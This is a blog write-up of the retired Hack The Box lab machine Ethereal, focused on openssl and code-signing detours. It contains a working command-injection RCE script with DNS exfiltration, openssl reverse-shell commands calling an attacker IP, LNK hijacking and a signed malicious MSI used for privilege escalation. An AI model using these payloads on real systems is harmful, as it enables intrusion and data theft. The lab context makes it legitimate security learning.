Ethereal @ hackthebox: Certificate-Related Rabbit Holes

This post is related to the ‘insanely’ difficult hackthebox machine Ethereal that was recently retired. Beware – it is by no means a comprehensive write-up! I zoom in on openssl, X.509 certificates, signing stuff, and related unnecessary rabbit holes that were particularly interesting to me – as somebody who recently described herself as a Dinosaur that supports some legacy (Windows) Public Key Infrastructures, like the Cobol Programmers tackling Y2K bugs.

Ethereal was insane, because it was so locked down. You got limited remote command execution by exfiltrating the output of commands over DNS, via a ‘ping’ web tool with a command injection vulnerability. In order to use that tool you had to find credentials in a password box database that was hidden in an image of a DOS floppy disk buried in other files on an FTP server. See excellent full write-ups by 0xdf and by Bernie Lim, or watch ippsec’s video.

For the DNS data exfiltration I am indebted to m0noc’s great video tutorial. You parse the output of the command in a for loop, and exfil data in chunks that make up a ‘host name’ sent to your evil DNS server. I am embedding my RCE script below.
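As a rough sketch of what happens to each line of output: the simulation below assumes that the for loop splits a line on whitespace into at most 26 tokens, and that loop variables without a token expand to nothing, so that the D prefix keeps every label non-empty. The function names are made up for illustration, and this is a model of the idea, not of every cmd.exe corner case.

```python
MAX_TOKENS = 26  # one token per loop variable %a .. %z


def line_to_hostname(line):
    """Simulate what the FOR /F loop turns one line of command output into."""
    tokens = line.split()[:MAX_TOKENS]
    # Assumption: loop variables without a token expand to nothing,
    # so their label consists of the 'D' prefix only.
    tokens += [''] * (MAX_TOKENS - len(tokens))
    return '.'.join('D' + token for token in tokens) + '.'


def hostname_to_tokens(hostname):
    """Recover the non-empty tokens from a queried name on the DNS server side."""
    labels = hostname.rstrip('.').split('.')
    return [label[1:] for label in labels if len(label) > 1]


name = line_to_hostname('alan jorge rupal')
print(name)
print(hostname_to_tokens(name))
```

Note that this simple decoder breaks as soon as a token itself contains a dot (a file name or an IP address, for example), because the dot then looks like a label separator.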

openssl – telnet-style

To obtain a reverse shell and to transfer files, you had to use openssl ‘creatively’ –  as a telnet replacement, running a ‘double shell’ with different windows for stdin and stdout.

In order to trigger this shell as ‘the’ user – the one with the flag, named jorge – you needed to overwrite an existing Windows shortcut file (.LNK) pointing to the Visual Studio 2017 executable. I created ‘malicious’ shortcuts using the python library pylnk, on a Windows system. The folder containing that file was also the only place at all where you could write to the file system as the initial ‘web injection user’, alan. I noticed that the overwritten LNK was replaced quickly, at least every minute – so I also hoped that a simulated user would ‘click’ the file every minute.

Creating certificate and key …

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Listening on the only ports open for outgoing traffic with two ‘SSL servers’:

openssl s_server -key key.pem -cert cert.pem -port 73
openssl s_server -key key.pem -cert cert.pem -port 136

The Reverse shell command to be used in the LNK file uses the ‘SSL client’:

C:\windows\System32\cmd.exe /c "C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.19:136 | cmd 2>&1 | C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -connect 10.10.14.19:73 2>&1 &"

The first rabbit hole I fell into was that I used openssl more ‘creatively’ than what was maybe needed. Though I found this metasploit module with a double telnet-style shell for Linux I decided to work on replacing the LNK first, and only go for a reverse shell if a simple payload in the LNK would work.

Downside of that approach: I needed another way of transferring the LNK file! If I had already had the reverse shell, I would have been able to use ‘half of it’ for transferring a file in the spirit of nc.

1) Run a ‘SSL server’ locally to be prepared for sending the file:

openssl s_server -quiet -key key.pem -cert cert.pem -port 73 <to_be_copied

2) Receive it using the SSL client:

openssl.exe s_client -quiet -connect 10.10.14.19:73 >to_be_copied

The usual ways to transfer files were blocked, for example certutil. certutil and certreq are the tools that are sort of an equivalent of openssl on Windows. certutil’s legit purpose is to manage the Windows PKI, manage certificate stores, analyze certificates, publish to certificate stores, download certificate revocation lists, etc. The latter option makes it a ‘hacker tool’ because it lets you download other files like wget or curl (depending on the version of Windows and Defender’s vigilance doing heuristic checks of the action performed, rather than on the EXE itself).

Nearly missing out on openssl

When I saw openssl – installed on Windows! – I hoped I was on to something! However, I nearly let go of openssl as I failed to test it properly. I ran openssl help in my nslookup shell, and did not get any response. Nearly every interesting EXE was blocked on Ethereal, so it came as no surprise that openssl seemed to be, too.

Only after I was stuck for quite a while and a kind soul gave me a nudge to not abandon openssl too fast, I realized that the openssl help output is actually sent to standard error, not standard out.

You can redirect stderr to stdout using 2>&1 – but if you run the command ‘embedded’ in the for loop (see python script below), you had better escape both special characters with a caret, like this:

'C:\progra~2\openssl-v1.1.0\bin\openssl.exe help 2^>^&1'
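The escaping can also be automated. The helper below is a minimal sketch under the assumption that the command is placed unquoted inside the for loop; the function name and the set of characters are illustrative and not a complete list of what cmd.exe treats specially.

```python
# Characters that cmd.exe treats specially and that '^' can escape
# outside of double quotes (an illustrative subset, not a complete list).
CMD_SPECIAL = '^&|<>()'


def caret_escape(command):
    """Prefix each cmd.exe metacharacter with a caret."""
    return ''.join('^' + ch if ch in CMD_SPECIAL else ch for ch in command)


print(caret_escape('openssl.exe help 2>&1'))
```

For the example command this prints openssl.exe help 2^>^&1, which matches the manually escaped version.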

File transfer with openssl base64 and echo

My solution was to base64 encode the file locally with openssl (rather than using base64, just ‘to play it safe’), to echo out the file in the DNS shell as alan on Ethereal, then base64 decode it and store it in the final location. I had issues with echoing out the full content in one line, so I did not use the -A option in openssl base64, but echoed one line after the other.

I had missed that I could write to the whole folder – I believed I could only write to this single LNK file. So I had to echo to the exact same file that I would also use as the final target, like so:

type target.lnk | openssl base64 -d -out target.lnk
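The ‘echo upload’ can be sketched in a few lines. This is a Python 3 illustration of the idea rather than the script I actually ran: the function name is hypothetical, and the width of 64 characters mirrors the line length openssl base64 produces without -A.

```python
import base64


def echo_commands(data, remote_path, width=64):
    """Build one 'echo' command per base64 line; the first one truncates the file."""
    b64 = base64.b64encode(data).decode('ascii')
    lines = [b64[i:i + width] for i in range(0, len(b64), width)]
    commands = []
    for index, line in enumerate(lines):
        # '>' creates or overwrites the file, '>>' appends to it.
        redirect = '>' if index == 0 else '>>'
        commands.append('cmd /c "echo {} {}{}"'.format(line, redirect, remote_path))
    return commands


# 100 placeholder bytes stand in for the content of the LNK file.
for command in echo_commands(bytes(range(100)), 'target.lnk'):
    print(command)
```

Each echo leaves a trailing blank before the line break in the remote file; the sketch assumes that the decoder on the other side tolerates this whitespace.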

Below is my final RCE script for a simple ‘shell’ – either executing input commands 1:1 or special (series of) commands using shortcuts. E.g. for ‘echo-uploading’ a file, decoding, and checking the result I used

F shell.lnk
decode
showdir

In case I wanted to run a command without having to worry about escaping, I could also run it blind, without any output via nslookup.

Script rce.py

import requests
import readline
import os
import sys

url = 'http://ethereal.htb:8080/'
headers = { 'Authorization' : 'Basic YWxhbjohQzQxNG0xN3k1N3IxazNzNGc0MW4h' }

server_dns = '10.10.14.19'
A_dns = 'D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%q.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z.'
template = '127.0.0.1 & ( FOR /F "tokens=1-26" %a in (\'_CMD_\') DO ( nslookup ' + A_dns + ' ' + server_dns + ') )'
template_blind = '127.0.0.1 & _CMD_'
template_lnk = '( FOR /F "tokens=1-26" %a in (\'_CMD_\') DO ( nslookup ' + A_dns + ' ' + server_dns + ') )'
# CSRF protections not automated as they did not change that often
# Copy from Burp, curl etc.
postdata = { 
    '__VIEWSTATE' : '/wEPDwULLTE0OTYxODU3NjhkZG8se05Gp91AdhB+bS+3cb/nwM7/1XnvqTtUaEoqfbcF',
    '__VIEWSTATEGENERATOR' : 'CA0B0334',
    '__EVENTVALIDATION' : '/wEdAAMwTZWDrxbqRTSpQRwxTZI24CgZUgk3s462EToPmqUw3OKvLNdlnDJuHW3p+9jPAN/MZTRxLbqQfS//vLHaNSfR4/D4qt+Wcl4tw/wpixmG9w==',
    'ctl02' : ''
}

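# Raw strings keep the Windows backslashes literal
target_lnk = r'C:\Users\Public\Desktop\Shortcuts\Visual Studio 2017.lnk'
target_lnk_dos = r'C:\Users\Public\Desktop\Shortcuts\Visual~1.lnk'
# A raw string cannot end in a backslash, so this one is escaped by hand
target_dir = 'C:\\Users\\Public\\Desktop\\Shortcuts\\'

openssl_path = r'C:\progra~2\openssl-v1.1.0\bin\openssl.exe'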

ask = True

def create_echo(infile_name, outfile_path):
    
    # File name must not include blanks
    b64_name = infile_name + '.b64'

    echos = []

    if not os.path.isfile(infile_name):
        print 'Cannot read file!'
        return echos
    else:
        os.system('openssl base64 -in ' + infile_name + ' -out ' + b64_name)
        f = open(b64_name, 'r')
    
    i = 0
    for line in f:
        towrite = line[:-1]
        if i == 0:
            echos += [ 'cmd /c "echo ' + towrite + ' >' + outfile_path + '"' ] 
        else:
            echos += [ 'cmd /c "echo ' + towrite + ' >>' + outfile_path + '"' ] 
        print line[:-1]
        i += 1

    f.close()
    return echos

def payload(cmd):
    return template.replace('_CMD_', cmd)

def payload_blind(cmd):
    return template_blind.replace('_CMD_', cmd)

def send(payload):
    print payload
    print ''
    
    if ask == True:
       go = raw_input('Enter n for discarding the command >>: ')
    else:
       go = 'y'

    if go != 'n':
        postdata['search'] = payload
        response = requests.post(url, data=postdata, headers=(headers))
        print 'Status Code: ' + str(response.status_code)
    else:
        print 'Not sent: ' + payload

while True:

    cmd = raw_input('\033[41m[dnsexfil_cmd]>>: \033[0m ')

    if cmd == 'quit': 
        break

    elif cmd == 'dontask':
        ask = False
        print 'ask set to: ' + str(ask)
    elif cmd == 'ask':
        ask = True
        print 'ask set to: ' + str(ask)

    elif cmd[0:2] == 'F ':
        infile = cmd[2:]
        echos = create_echo(infile, target_lnk_dos)
        link = ' & '
        cmd_all_echos = link.join(echos)
        send(payload_blind(cmd_all_echos))

    elif cmd[0:2] == 'B ':
        cmd_blind = cmd[2:]
        send(payload_blind(cmd_blind))
       
    elif cmd == 'decode':
        cmd = 'type "' + target_lnk + '" | ' + openssl_path + ' base64 -d -out "' + target_lnk + '"'
        send(payload_blind(cmd))

    elif cmd == 'showdir':
        cmd = 'dir ' + target_dir
        send(payload(cmd))

    elif cmd == 'showfile':
        cmd = 'type "' + target_lnk + '"'
        send(payload(cmd))

    else:
        send(payload(cmd))

Finding that elusive CA certificate

After I finally managed to run a shell as jorge I fell into lots of other rabbit holes – e.g. analyzing, modifying, and compiling a recent Visual Studio exploit.

Then I ran tasklist for the umpteenth time, and saw an msiexec process! And lo and behold, even my user jorge was able to run msiexec! This fact was actually not important, as I found out later that I should wait for another (admin) user to run something.

I researched ways to use an MSI for applocker bypass. As described in detail in other write-ups you could use a simple skeleton XML file to create your MSI with the WIX toolset. WIX was the perfect tool to play with at Christmas when I did this box – it’s made up of executables called light.exe, candle.exe, lit.exe, heat.exe, shine.exe, torch.exe, pyro.exe, dark.exe, melt.exe … 🙂

So I also created a simple MSI, ran it as jorge and nothing happened. Honestly, I cannot tell with hindsight if that should have possibly worked – just without any escalation to an admin or SYSTEM context – or if I made an error again. But because of my focus on all things certificates and signatures, I suspected the MSI had to be signed – that would also be in line with the locked-down spirit of this box.

Signed code only runs if the certificate is trusted. So I needed to sign the MSI either with a ‘universally’ / publicly trusted certificate (descending from a CA certified in the Microsoft Root Program) or with a key and certificate on the box that I had not found yet. Both turned out to be another good chance for falling into rabbit holes!

Testing locally with certificates in the Windows store

I used one of my Windows test CAs and issued a Code Signing certificate, then used signtool to sign a test MSI. The reference to the correct store is in this case the CN of the Subject Name which should be unique in your store:

signtool sign /n Administrator /v pingtest.msi

The MSI could be ‘installed’ and my ping worked on a test Windows box. So I knew that the signing procedure worked, but I needed a certificate chain that Ethereal would trust. With hindsight, given my false assumption that jorge would run the MSI, I should also have considered that jorge could install a Root CA certificate of my liking into his (user’s) Root certificate store. It should theoretically be doable by fiddling with the registry only (see second hilarious rabbit hole below), but normally I would use certutil for that. And certutil was definitely blocked.

Publicly trusted certificate

I do have one! Our Austrian health insurance smartcards have pre-deployed keys, and you can enroll for X.509 certificates for those keys. So on a typical Windows box, code signed with this ID card would run. But there is a catch: Windows does not – anymore, since Vista if I recall correctly – pre-populate the store with all the Root CAs certified by Microsoft. If you try to run a signed MSI (or visit an HTTPS website, or read a signed e-mail), then Windows will download the required root certificate as needed. But hackthebox machines are not able to access the internet.

Yet, in despair I tried, for the unlikely case all the roots were there. Using signtool like so, it will let me pick the smartcard certificate, and I was prompted for the PIN:

signtool sign /a /v pingtest.msi

So if my signed MSI had screwed up the box, I could not have denied it – a use-case of the Non-Repudiation Key Usage 😉

Uploaded my smartcard-signed MSI. And failed to run it.

Ages-old Demo CA – and how to use openssl for signing

There was actually a CA on the box, sort of – the demoCA that comes with the openssl installation. A default CA key and certificate come with openssl, and the perl script CA.pl can be used to create ‘database-like files and folders’. In despair I used this default CA certificate and key – maybe it was trusted as a kind of subtle joke? I did not bother to look closely at the CA certificate – otherwise I would have noticed it had expired long ago 🙂

The process I tested for signing was the same I used later. As makecert is the tool that many others have used to solve this, I quickly sum up the openssl process.

You can either use the openssl ca ‘module’ – or openssl x509. The latter is a bit simpler as you do not need to prepare the CA’s ‘database’ directories.

Of course I used Windows GUI tools to create the request 🙂

  • Start, Run, certmgr.msc
  • Personal, All Tasks, Advanced Operations, Create Custom Request
  • Custom PKCS#10 Request.
  • Extensions:
    Key Usage = Digital Signature
    Extended Key Usage = Code Signing
  • Private Key, Key Options: 2048 Bit
  • BASE64 encoding

The result is a BASE64 encoded ‘PEM’ certificate signing request. You can sign with the demoCA’s key like this – I did this on my Windows box.

openssl x509 -req -in req.csr -CA cacert.pem -CAkey private\cakey.pem -CAcreateserial -out codesign.crt -days 500 -extfile codesign.cnf -extensions codesign

There are different ways to make sure that the Code Signing Extended Key Usage gets carried over from the request to the certificate, or that it is ‘added again’. In the openssl.cnf config file (default or referenced via -config) you can e.g. set copy_extensions for the openssl ca module.

In the example above, I used a separate file for extensions. (Values seem to be case-sensitive, also on Windows).

[ codesign ]

keyUsage=digitalSignature
extendedKeyUsage=codeSigning

To complete the process, the Root CA certificate is imported into the Trusted Root Certification Authorities store in certmgr.msc, and the Code Signing certificate is imported into Personal certificates in certmgr.msc. In case the little key icon does not show up, key and certificate have not been properly united, which can be fixed with

certutil -repairstore -user my [Serial Number of the cert]

The file is signed without issues, however the resulting chain violates basic requirements for certificate path validation: The CA’s end of life was in 1998.

certutil cacert.pem

X509 Certificate:
Version: 1
Serial Number: 04
Signature Algorithm:
Algorithm ObjectId: 1.2.840.113549.1.1.4 md5RSA
Algorithm Parameters:
05 00
Issuer:
CN=SSLeay/rsa test CA
S=QLD
C=AU
Name Hash(sha1): 4f28bdc33fb78c854e2ceb26210f981bb73ce9ea
Name Hash(md5): ee7084bbed50615d1e118ff2ada590cf

NotBefore: 10.10.1995 00:32
NotAfter: 06.07.1998 00:32

Subject:
CN=SSLeay demo server
OU=CS
O=Mincom Pty. Ltd.
S=QLD
C=AU
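The validity check that this chain fails is easy to reproduce. The sketch below assumes that the dump uses a day.month.year format and ignores time zones; the helper name and the reference date are arbitrary choices for illustration.

```python
from datetime import datetime

CERTUTIL_FORMAT = '%d.%m.%Y %H:%M'  # assumed: day.month.year, as in the dump above


def is_within_validity(not_before, not_after, when):
    """Return True if 'when' lies inside the certificate's validity period."""
    start = datetime.strptime(not_before, CERTUTIL_FORMAT)
    end = datetime.strptime(not_after, CERTUTIL_FORMAT)
    return start <= when <= end


# Any date around the time the box was live gives the same answer.
print(is_within_validity('10.10.1995 00:32', '06.07.1998 00:32', datetime(2019, 1, 1)))
```

This prints False: whatever the certificate signs, the path is outside its validity period.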

Weird way to find a CA certificate

This was – for me – the most hilarious part of owning this box. The mysterious Root CA had to be in the Windows registry, and I had no certutil. So I resorted to looking at the registry directly.

‘Windows Certificate stores’ are collections of different registry keys; this was the one relevant here.

C:\>reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85
....

But I wanted to look into the binary certificates stored under those keys, so I dumped each of the keys (like 18F7C1FCC3090203FD5BAA2F861A754976C8DD25) and copied the contents from the terminal to a python script. This snippet shows only a single cert in the list:

certs = [
...
'190000000100000010000000E53D34CECB05C17EE332C749D78C02560F000000010000001000000065FC47520F66383962EC0B7B88A0821D03000000010000001400000018F7C1FCC3090203FD5BAA2F861A754976C8DD2509000000010000000C000000300A06082B060105050703080B000000010000003400000056006500720069005300690067006E002000540069006D00650020005300740061006D00700069006E00670020004300410000001400000001000000140000003EDF290CC1F5CC732CEB3D24E17E52DABD27E2F02000000001000000C0020000308202BC3082022502104A19D2388C82591CA55D735F155DDCA3300D06092A864886F70D010104050030819E311F301D060355040A1316566572695369676E205472757374204E6574776F726B31173015060355040B130E566572695369676E2C20496E632E312C302A060355040B1323566572695369676E2054696D65205374616D70696E67205365727669636520526F6F7431343032060355040B132B4E4F204C494142494C4954592041434345505445442C20286329393720566572695369676E2C20496E632E301E170D3937303531323030303030305A170D3034303130373233353935395A30819E311F301D060355040A1316566572695369676E205472757374204E6574776F726B31173015060355040B130E566572695369676E2C20496E632E312C302A060355040B1323566572695369676E2054696D65205374616D70696E67205365727669636520526F6F7431343032060355040B132B4E4F204C494142494C4954592041434345505445442C20286329393720566572695369676E2C20496E632E30819F300D06092A864886F70D010101050003818D0030818902818100D32E20F0687C2C2D2E811CB106B2A70BB7110D57DA53D875E3C9332AB2D4F6095B34F3E990FE090CD0DB1B5AB9CDE7F688B19DC08725EB7D5810736A78CB7115FDC658F629AB585E9604FD2D621158811CCA7194D522582FD5CC14058436BA94AAB44D4AE9EE3B22AD56997E219C6C86C04A47976AB4A636D5FC092DD3B4399B0203010001300D06092A864886F70D01010405000381810061550E3E7BC792127E11108E22CCD4B3132B5BE844E40B789EA47EF3A707721EE259EFCC84E389944CDB4E61EFB3A4FB463D50340B9F7056F68E2A7F17CEE563BF796907732EB095288AF5EDAAA9D25DCD0ACA10098FCEB3AF2896C479298492DCFFBA674248A69010E4BF61F89C53E593D1733FF8FD9D4F84AC55D1FD116363',
....
]
for cert in certs:
    print '======================================='
    print cert
    print '======================================='
    print cert.decode('hex')
    print '======================================='
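A slightly less brute-force alternative is to split the blob into its fields. The layout assumed here is inferred from the hex dump above and not taken from any documentation: each entry seems to consist of three little-endian 32-bit values (a property id, a field that is always 1, and a length) followed by the value itself. In the dump, property 3 carries the SHA1 thumbprint that also names the registry key, property 11 a UTF-16 friendly name, and property 32 the DER-encoded certificate. The function name is made up.

```python
import struct


def parse_registry_cert_blob(hex_blob):
    """Split a certificate blob from the registry into {property_id: raw_bytes}."""
    data = bytes.fromhex(hex_blob)
    properties = {}
    offset = 0
    while offset + 12 <= len(data):
        # Assumed layout: property id, a field that is always 1 in the
        # dump above, and the length of the value that follows.
        prop_id, _unknown, length = struct.unpack_from('<III', data, offset)
        offset += 12
        properties[prop_id] = data[offset:offset + length]
        offset += length
    return properties


# Two properties cut from the VeriSign entry shown above.
sample = (
    '03000000010000001400000018F7C1FCC3090203FD5BAA2F861A754976C8DD25'
    '0B0000000100000034000000'
    '56006500720069005300690067006E002000540069006D0065002000'
    '5300740061006D00700069006E0067002000430041000000'
)
props = parse_registry_cert_blob(sample)
print(props[3].hex().upper())
print(props[11].decode('utf-16-le').rstrip('\x00'))
```

For the sample this prints the thumbprint 18F7C1FCC3090203FD5BAA2F861A754976C8DD25 and the name VeriSign Time Stamping CA.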

OK, certainly not the most elegant way to deal with it, but I was losing patience – I was on the warpath!!

Strings in the output contain the CA’s Issuer and Subject Name, and most were familiar: Microsoft, VeriSign, etc. With this exception:

=======================================
¬·╟<          òë┌┐ò$º¿Y╔&┌╢e½s╦π≥│τÇ╤#w▌╙o╠D       ╖è╔└eîqD╕ß!└öPδ⌠ ¡      ü¿M»╬Φv√tÄ.LgawĽ0ß       τ9╡ïε╢æï
  é0é010 U  My CA0é"0≥▀~àE~Γ<éíFj0
é ¥═p|ÉÉ▒ôfD╬,°á3╣Zƒ╕Cáφs╖Kεmìδ╗wFo2ßÄK ┘Xì╧Y?ÉR╢&,V┘Ω╠û5¬Σ▒┴Γ╧B·Gb4éτåi0Ku rí╕Oh≈φ¬u≤h¥J ┌┌º(┐Jk<√=-9{£H[▀ªP&«¢ΣU■2~ ½Öº-4║o/σ£oºå─∙Åédü¿éÅêr▐O.╘<'Qu∙w0~▒A±·â·{k
  é hòÿâ⌠╝*εC╡Åπs⌠╝[░╣±kπ{≥¬æ±¬╠b┐╤GëJ»i%┴       ╕ìiΦπ %¬*π[ò╗,9ü:╦-5  úV0T0 U  0  0A U :08ǽÖ┬ï]═8¬I¡X^⌠í010 U  My CAé÷h≥▀~àE~Γ<éíFj0

▀ó*┌û╞Qfè£ⁿ─;Lτ·II╫─╓┴¼╤N∩j Φ
)x═Mπ╪₧⌠ç╛ê┤YF:╛╢╙êDτσªM]Gá⌐ S≡∞Yg J»╪u

...

Maybe hard to spot, but there was a CA called My CA! But where was the key I needed to sign my own Code Signing cert?

In such cases, I typically resort to more Windows registry forensics. I hoped that ‘jorge’ or the box’s creators had touched a folder with this certificate and key. I walked through various Explorer-related keys, especially the infamous Shellbags:

HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2
    NodeSlot    REG_DWORD    0x3
    MRUListEx    REG_BINARY    0100000000000000FFFFFFFF
    0    REG_BINARY    4A00310000000000DB4CD6B3100044455600380009000400EFBEDB4C8FB3DB4CD6B32E0000002400000000000100000000000000000000000000000099306500440045005600000012000000
    1    REG_BINARY    5000310000000000E74C4AAE10004365727473003C0009000400EFBEE74C41AEE74C4AAE2E000000492E0000000003000000000000000000000000000000EAE7BD0043006500720074007300000014000000

HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1

… and I really saw a folder called Certs after decoding:

>>> print s.decode('hex')
n 1     µLGu VISUAL~1  V          ∩╛µLGuµLGu.   z¿                    åUÉ V i s u a l   S t u d i o   2 0 1 7   
>>> s='4A00310000000000DB4CD6B3100044455600380009000400EFBEDB4C8FB3DB4CD6B32E0000002400000000000100000000000000000000000000000099306500440045005600000012000000'
>>> print s.decode('hex')
J 1     █L╓│ DEV 8        ∩╛█LÅ│█L╓│.   $                    Ö0e D E V   
>>> s='5000310000000000E74C4AAE10004365727473003C0009000400EFBEE74C41AEE74C4AAE2E000000492E0000000003000000000000000000000000000000EAE7BD0043006500720074007300000014000000'
>>> print s.decode('hex')
P 1     τLJ« Certs <      ∩╛τLA«τLJ«.   I.                    Ωτ╜ C e r t s    >>>
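The manual decoding above can be condensed into a crude strings-style helper. It is a sketch that only looks for ASCII text stored as UTF-16LE and knows nothing about the actual structure of a shell item, so it may pick up a stray leading character now and then. The function name is made up.

```python
import re

# Runs of at least three printable ASCII characters, each followed by a
# zero byte, i.e. ASCII text stored as UTF-16LE.
UTF16_RUN = re.compile(rb'(?:[\x20-\x7e]\x00){3,}')


def utf16_strings(hex_blob):
    """Return the UTF-16LE strings found in a hex-encoded registry value."""
    data = bytes.fromhex(hex_blob)
    return [match.group().decode('utf-16-le') for match in UTF16_RUN.finditer(data)]


# The second BagMRU value from the registry query above.
certs_item = '5000310000000000E74C4AAE10004365727473003C0009000400EFBEE74C41AEE74C4AAE2E000000492E0000000003000000000000000000000000000000EAE7BD0043006500720074007300000014000000'
print(utf16_strings(certs_item))
```

For this value the helper returns a list with the single entry Certs.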

… and a link to a folder called MSIs:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\Folder
    0    REG_BINARY    5000750062006C0069006300000060003200000000000000000000005075626C69632E6C6E6B0000460009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000005000750062006C00690063002E006C006E006B0000001A000000
    MRUListEx    REG_BINARY    020000000100000000000000FFFFFFFF
    1    REG_BINARY    4D0053004900730000005A003200000000000000000000004D5349732E6C6E6B0000420009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000004D005300490073002E006C006E006B00000018000000
...
>>> s='4D0053004900730000005A003200000000000000000000004D5349732E6C6E6B0000420009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000004D005300490073002E006C006E006B00000018000000'
>>> print s.decode('hex')
M S I s   Z 2           MSIs.lnk  B        ∩╛        .                             M S I s . l n k   
>>> 

Then I did what I should have done before – checking out the Recent Docs folder directly …

Directory of C:\Users\jorge\AppData\Roaming\Microsoft\Windows\Recent

07/07/2018  09:47 PM               405 EFS.lnk
07/07/2018  09:53 PM               555 MSIs.lnk
07/07/2018  09:53 PM               678 note.lnk
07/07/2018  09:49 PM               690 Public.lnk
07/09/2018  09:13 PM               612 system32.lnk
07/04/2018  09:17 PM               527 user.lnk

… the file MSIs.lnk contained the path:

...
D:\DEV\MSIs
...

So there was a D: drive I had totally missed – and there you found a key MyCA.pvk and a certificate MyCA.cer.

The ‘funny’ thing now is that the LNK file hijacked before pointed to Visual Studio installed on the D: drive. So the intended way was likely to go straight to this folder, see the certificates and the MSIs folder, and conclude that you need to sign an MSI.

Signing that darn thing finally 🙂

I wanted to re-use the openssl process I tested before. openssl cannot use PVK files (AFAIK 😉), but you can convert PVK keys to PFX (PKCS#12).

I ran

pvk2pfx /pvk MyCA.pvk /spc MyCA.cer

… to start a GUI certificate export wizard that let me specify the PFX password.

Then I converted the PFX key to PEM

openssl pkcs12 -in MyCA.pfx -out MyCA.pem -nodes

… and the binary (‘DER’) certificate to PEM

openssl x509 -inform der -in MyCA.cer -out MyCA.cer.pem
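For the certificate, the conversion is nothing more than base64 plus a header and footer, which Python’s standard ssl module can do as well. A minimal sketch with placeholder bytes instead of the real MyCA.cer; the two wrapper names are made up, and neither function validates that the bytes are a certificate at all.

```python
import ssl


def der_to_pem(der_bytes):
    """Wrap DER bytes in base64 with the BEGIN/END CERTIFICATE armor."""
    return ssl.DER_cert_to_PEM_cert(der_bytes)


def pem_to_der(pem_text):
    """Strip the armor and decode the base64 body back to DER bytes."""
    return ssl.PEM_cert_to_DER_cert(pem_text)


# Placeholder bytes stand in for the content of MyCA.cer.
fake_der = bytes(range(48))
pem = der_to_pem(fake_der)
print(pem.splitlines()[0])
```

This covers certificates only; the private key in the PFX still needs openssl pkcs12 as shown above.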

I signed a Code Signing certificate for a user with CN Test 1 (same process as with the demoCA), and used this to sign the final payload! Imported MyCA.cer to the Trusted Roots and referenced again the CN of the user in signtool:

signtool sign /n "Test 1" /v half_shell_MyCA.msi
The following certificate was selected:
    Issued to: Test 1
    Issued by: My CA
    Expires:   Sat May 09 14:54:50 2020
    SHA1 hash: 0CDBA139B0E93813969E9E82F1E739C962BA6A3B

Done Adding Additional Store
Successfully signed: half_shell_MyCA.msi

Number of files successfully Signed: 1
Number of warnings: 0
Number of errors: 0

I verified the MSI also with

signtool verify /pa /v half_shell_MyCA.msi

My final signed MSI payload was what I called a half shell, a command like this:

C:\windows\System32\cmd.exe /c "C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.19:136 | cmd &"

You can execute commands, but you do not get the output back. I tried to use my resources most efficiently.

A text note told us that the admin ‘rupal’ would test MSIs frequently. So I needed one openssl listener – and thus one of the two precious open ports – to wait for rupal.

I used the other open port for uploading the MSI, ‘nc-style’ again with openssl.

But if I really wanted output from the blind half shell, I could also embed the command in nslookup. So I used rce.py to create this type of command (for that it has an option to just display but not run a command), which I would then paste into the input window of jorge’s half shell.

FOR /F "tokens=1-26" %a in ('copy half_shell_MyCA.msi D:\DEV\MSIs') DO ( nslookup D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%q.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z. 10.10.14.19)
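Commands like this one can also be generated rather than typed. The sketch below is a Python 3 illustration with a made-up function name, not part of rce.py; building the 26 labels from the alphabet avoids slips in a hand-typed list.

```python
import string


def wrap_for_exfil(command, dns_server):
    """Wrap a command in a FOR /F loop that sends its output via nslookup."""
    # One label per loop variable %a .. %z, each prefixed with 'D'.
    labels = '.'.join('D%' + letter for letter in string.ascii_lowercase) + '.'
    return 'FOR /F "tokens=1-26" %a in (\'{}\') DO ( nslookup {} {})'.format(
        command, labels, dns_server)


print(wrap_for_exfil('dir D:\\DEV\\MSIs', '10.10.14.19'))
```

Special characters inside the wrapped command still need to be escaped for cmd.exe before pasting.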

And rupal called back!

\o/

But he also had only half a shell, so I read root.txt via nslookup, pasting this command into his half shell:

FOR /F "tokens=1-26" %a in ('type C:\Users\rupal\Desktop\root.txt') DO ( nslookup D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%q.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z. 10.10.14.19)

What an adventure!


Hacking

I am joining the ranks of self-proclaimed productivity experts: Do you feel distracted by social media? Do you feel that too much scrolling through feeds transforms your mind – in a bad way? Solution: Go find an online platform that will put your mind in a different state. Go hacking on hackthebox.eu.

I have been hacking boxes over there for quite a while – and obsessively. I really wonder why I did not try to attack something much earlier. It’s funny as I have been into IT security for a long time – ‘infosec’ as it seems to be called now – but I was always a member of the Blue Team, a defender: Hardening Windows servers, building Public Key Infrastructures, always learning about attack vectors … but never really testing them extensively myself.

